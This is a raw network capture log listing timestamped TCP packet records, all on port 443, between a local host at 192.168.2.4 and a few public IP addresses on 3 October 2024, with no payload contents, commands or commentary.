                                                                              Oct 3, 2024 03:13:57.709955931 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.710278988 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.710339069 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.710357904 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.710416079 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.710779905 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.710838079 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.710865021 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.710920095 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.710943937 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.711002111 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.711616993 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.711683035 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.711703062 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.711759090 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.711786985 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.711839914 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.712255001 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.712321997 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.712332964 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.712378979 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.712412119 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.712480068 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.712548971 CEST49772443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.712558985 CEST44349772104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.717124939 CEST49774443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.717175007 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.717266083 CEST49774443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.717422009 CEST49774443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.717432976 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.928524017 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.928883076 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.928946972 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.929415941 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.929800987 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.929800987 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:57.929821968 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.929879904 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:57.983584881 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.060230970 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060352087 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060442924 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060476065 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.060517073 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060566902 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.060575962 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060674906 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060725927 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.060731888 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060832977 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060889006 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.060894966 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.060972929 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.061024904 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.061031103 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.118515015 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.118549109 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.147181034 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.147289991 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.147372007 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.147370100 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.147428989 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.147430897 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.147828102 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.147883892 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.147901058 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.147989035 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.148040056 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.148047924 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.148139000 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.148189068 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.148195028 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.148657084 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.148711920 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.148718119 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.148808002 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.148864985 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.148871899 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.149619102 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.149674892 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.149681091 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.149771929 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.149823904 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.149828911 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.150662899 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.150721073 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.150726080 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.150887012 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.150938988 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.150944948 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.178280115 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.178816080 CEST49774443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.178848028 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.179303885 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.179678917 CEST49774443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.179760933 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.179869890 CEST49774443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.203284979 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.203319073 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.223490000 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.234580040 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.234684944 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.234759092 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.234772921 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.234800100 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.234824896 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.234942913 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.234997988 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.235013008 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.235116959 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.235137939 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.235192060 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.235198975 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.235219002 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.235275030 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.235280991 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.235351086 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.235356092 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236077070 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236148119 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.236155987 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236174107 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236208916 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.236215115 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236252069 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.236258030 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236325026 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.236331940 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236356974 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236378908 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.236385107 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236422062 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.236713886 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236780882 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.236787081 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.236835957 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.237035990 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.237121105 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.237281084 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.237344027 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.237369061 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.237435102 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.237447977 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.237509966 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.237742901 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.237845898 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.321973085 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.322158098 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.322191000 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.322212934 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.322237968 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.322344065 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.322344065 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.322344065 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.322359085 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.322523117 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.322688103 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.322695971 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.322716951 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.322741032 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.322956085 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.323013067 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.327071905 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.327238083 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.327301025 CEST49774443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.344294071 CEST49773443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.344326019 CEST44349773104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.428925037 CEST49774443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.428961039 CEST44349774104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.488715887 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.488739967 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.488833904 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.488992929 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.489005089 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.490120888 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.490205050 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.490302086 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.490413904 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.490439892 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.507194996 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:58.551441908 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:58.615569115 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:58.615716934 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:58.616033077 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:58.616406918 CEST49762443192.168.2.4188.114.96.3
                                                                              Oct 3, 2024 03:13:58.616470098 CEST44349762188.114.96.3192.168.2.4
                                                                              Oct 3, 2024 03:13:58.625184059 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:58.625267982 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:58.625449896 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:58.625530958 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:58.625555038 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:58.646006107 CEST49778443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.646099091 CEST44349778104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.646193027 CEST49778443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.646353960 CEST49778443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.646384001 CEST44349778104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.948981047 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.949435949 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.949469090 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.949929953 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.950402021 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.950402975 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.950498104 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.974634886 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.974854946 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.974915028 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.975462914 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.975708961 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:58.975804090 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:58.975806952 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.002361059 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.019412041 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.028034925 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.087898016 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.087951899 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.087989092 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.088021040 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.088058949 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.088090897 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.088124037 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.088213921 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.088213921 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.088213921 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.088238955 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.088288069 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.088365078 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.091648102 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.092606068 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.092659950 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.092668056 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.094872952 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.094880104 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.095968008 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.096050978 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.100835085 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.100898027 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.100989103 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.100997925 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.114721060 CEST44349778104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.114958048 CEST49778443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.114995956 CEST44349778104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.116117001 CEST44349778104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.116478920 CEST49778443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.116524935 CEST49778443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.116524935 CEST49778443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.116544008 CEST44349778104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.116580963 CEST44349778104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.116717100 CEST44349778104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.133440971 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.133605957 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.133677006 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.134448051 CEST49776443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.134465933 CEST44349776104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.142802954 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.142817974 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.142857075 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.158338070 CEST49778443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.174391985 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.174484968 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.174508095 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.174568892 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.174618959 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.174648046 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.174726009 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.174726009 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.174736977 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.175237894 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.175293922 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.175299883 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.175312996 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.175359011 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.175592899 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.175826073 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.175869942 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.175889969 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.175899029 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.175945044 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.176312923 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.176419020 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.176469088 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.176476002 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.176575899 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.176625013 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.176632881 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.177334070 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.177365065 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.177390099 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.177397966 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.177448988 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.177484035 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.215636969 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.215684891 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.215954065 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.215977907 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.216262102 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.223212957 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.223455906 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.223609924 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.223609924 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.223637104 CEST4434977735.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.223849058 CEST49777443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.223997116 CEST49780443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.224052906 CEST4434978035.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.224143028 CEST49780443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.224329948 CEST49780443192.168.2.435.190.80.1
                                                                              Oct 3, 2024 03:13:59.224349022 CEST4434978035.190.80.1192.168.2.4
                                                                              Oct 3, 2024 03:13:59.261269093 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.261322021 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.261374950 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.261389017 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.261488914 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.261540890 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.261548042 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.261775970 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.261833906 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.261842012 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.261899948 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.262026072 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.262082100 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.262088060 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.262135029 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.262471914 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.262536049 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.262649059 CEST44349775104.18.94.41192.168.2.4
                                                                              Oct 3, 2024 03:13:59.262708902 CEST49775443192.168.2.4104.18.94.41
                                                                              Oct 3, 2024 03:13:59.262861967 CEST44349775104.18.94.41192.168.2.4
